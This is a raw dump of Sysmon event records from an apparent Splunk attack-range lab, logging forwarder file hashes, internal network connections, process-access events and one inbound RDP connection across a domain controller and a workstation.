23542300x80000000000000001055600Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:38.447{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=CF0F965B72875B12A98EAD326D20BBAE,SHA256=C3CED0543B5385FC1FAF2C73F706148B14F362552660D77899FF4906ECEE0ED1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055599Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:38.294{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0FE0F3E2DA411AE082E77609E9A3B961,SHA256=9F059C833BD509165042B294459A5CD2310E77904E3DCF953F9E8CC59178D240,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810918Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:36.227{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57499-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810920Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:39.453{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2C7297661908C5A1B70BCD338A42C3F5,SHA256=7607D712F9A54E41F1AFC903879310FDA40E8871EB05599BFA8F7C997694626C,IMPHASH=00000000000000000000000000000000falsetrue 
354300x80000000000000001055613Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:30.570{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62011-false10.0.1.12-8000- 23542300x80000000000000001055612Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:39.294{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08148704D63F8F23A3EDC7C13B983897,SHA256=BAA495A9104D60676F0C28D8489D7061AD51CC5AFBC0BE25A00C5987E998E284,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810923Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:40.547{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B01C883E430F46B550733700979ECE77,SHA256=0117AC8F48BAD28CFF1BCADC607AA36AC4662D78DF8BF3920A79836C83FC4639,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810922Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:40.547{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F95D3A87356F56609D502BA588C74C70,SHA256=FCD73BF612EF7636A1187400260D8765AAF72B18FFE4559FB0077AEAB72DFEF0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810921Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:10:40.453{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=50B28D5A2B1DA5522B35C233A7933EAB,SHA256=A32295109C4AC4AB133BBE24B6EBD984E997533604C4468544F0B8CD6DC9D8E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055614Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:40.309{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E12550DB721B9377483652874136B325,SHA256=3A0B216DFD526DCCB31C067099B14C3EAEDA06499E0A77DFEB0837FBD0CC0E06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055616Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:41.310{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3457AFDA3069E612607D076AB18347B6,SHA256=3DD8B6482CD4A16C74144AADF3C39FA9CE8D888FD21D91E5263A78762F78FA79,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810925Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:41.484{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9DCB32C25AD2B57A3595AFB04BD9290,SHA256=E9FCA4ACFA9BE6AF36F0F6DF377E45FE5237CEE7AEB74C9A8D8C0A3D3138422C,IMPHASH=00000000000000000000000000000000falsetrue 
354300x8000000000000000810924Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:39.427{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-8184-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 354300x80000000000000001055615Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:33.078{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57500-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x8000000000000000810927Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:42.500{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9EAEC9B290BAE548F3BDCF834F28CBE6,SHA256=4B0165FBAC69773E2FC862FC94E6DC1CC5C1D42E744F145280F5A0848BFF353B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055617Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:42.326{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60891DF78F4C7BC7972CF6B7CCA46A02,SHA256=B89581B008272664BF4700F3AE2D10B8596EBC5661EA1E2F6181BB53B2EEDC3E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810926Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:39.706{0C1E0330-048F-60E8-0B00-00000000D001}628C:\Windows\System32\lsass.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57500-false10.0.1.14ip-10-0-1-14.eu-central-1.compute.internal49676- 23542300x8000000000000000810928Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:43.516{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B45B1D29C22F753EE0C7BBB065DE77F,SHA256=A5DF8CE812E909067D4D065F926C9D3DC45E9A2AA5718E94944929D062C2F9AD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055619Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:43.345{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4071CEC5DABFAE6769262FECB3F39D3,SHA256=6C38A258F4EEC6859F5711BB32E1F0B7E4BB70F41984D2A32FA246EB3C9986E9,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055618Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:35.631{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62012-false10.0.1.12-8000- 23542300x8000000000000000810930Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:44.516{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2281B60A066FE61BBE2FD2196698EA4E,SHA256=82A62886FA0A4742B9962267C5697105EF87222FDBE4D0325501DC41C8BEAE76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055620Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:44.360{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6761C64ABA0D7EB70CC8FD27456D0EEA,SHA256=4D6BA86C5AECD351CB8CF6C4F095C309B2816FF1F461B72BFEC31975ACAB988F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000810929Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:42.242{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57501-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810931Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:45.562{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77402A5C2D544BD8EE176ECE2FC92848,SHA256=82C4D1C0DF65027E4D27B769FAACE75092A67CAD791816612267C2E8499CB3D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055621Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:45.375{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86687640DA1764B8EE70EF7390783E0A,SHA256=2894FD9CB151DD80999A2A74DA41E41EE47C221E817BB5A18FD3C6F7C98F4B0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055622Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:46.390{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C61395D2352665670970642BA19070E5,SHA256=4E32055A929145CC2A8933177BC98994D12B45092335A6349AAC888127D06B17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810932Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:46.594{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FB584F05CCAD242D29504FDC67FDAC8,SHA256=E203A109976346C80BBDFB8A1EB14A601CCD61D64F7925ED998C929FBFF00128,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810933Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:47.625{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=70F4DF769DF10F91E137E140BB741DB1,SHA256=6E427C96C841F4DBD0B6C51E4C281F54DA1CBBD376E6E1D2DA419809586FDC1F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055625Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:47.490{466BC892-32D3-60E8-770B-00000000CF01}6356700C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6285e|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055624Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:47.490{466BC892-32D3-60E8-770B-00000000CF01}6356700C:\Windows\Explorer.EXE{466BC892-F4EE-60EB-437D-00000000CF01}5240C:\Program Files\Notepad++\notepad++.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61724|C:\Windows\System32\SHELL32.dll+62827|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+7b7ef|C:\Windows\System32\windows.storage.dll+7a56f|C:\Windows\System32\windows.storage.dll+7d51f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39cf9|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001055623Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:47.424{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0A889B53BCCB3B733C20A501626F374,SHA256=FB4BC8AC52BEE6719E24ED08BB71527673DCF45C5A4641704BE5B35F6A399BC7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810934Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:48.625{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32CBF5BC922BFE74EB4A8CBF93436CCE,SHA256=693408D4D7397BE2CF060E1ADB02D204D652FB25B6D2FB3B399E13F6EA838BE3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055626Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:48.442{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D63AC68FC11B803850A2D32B04534F47,SHA256=2929264538730412482C5D02C293035EBA98D2AEE5BFAE7E49344D0EF2D5F8B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810936Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:49.672{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=904A7493D0F8EFCE331C835930B2DA15,SHA256=CB7ECA2202254937E0031A4817A39465F1B6CDDDB9267B53406A7F737807B568,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001055628Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:49.456{466BC892-02CE-60E8-7600-00000000CF01}3400NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E5B6F0DCDAC3F1139C228572A0C0877,SHA256=2BAE6855BEC33791CC62AF455E1F1F7EEB8310D5C7FFD210C71552DE32A82456,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001055627Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:40.697{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local62013-false10.0.1.12-8000- 354300x8000000000000000810935Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:47.336{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57502-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000810937Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:10:50.719{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=345434F641680E2BEB4B61A3A399D13E,SHA256=57968FFA30DBBDB7CED1E713ED1D7E67E57EC9D95E189780C92CB53F9A90AB59,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001055646Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.825{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F90A-60EB-137E-00000000CF01}292C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055645Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.823{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055644Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:50.823{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055643Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.823{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055642Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:10:50.822{466BC892-02AF-60E8-0C00-00000000CF01}8447308C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001055641Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.822{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F90A-60EB-137E-00000000CF01}292C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001055640Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.821{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F90A-60EB-137E-00000000CF01}292C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001055639Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:10:50.805{466BC892-F90A-60EB-137E-00000000CF01}292C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT 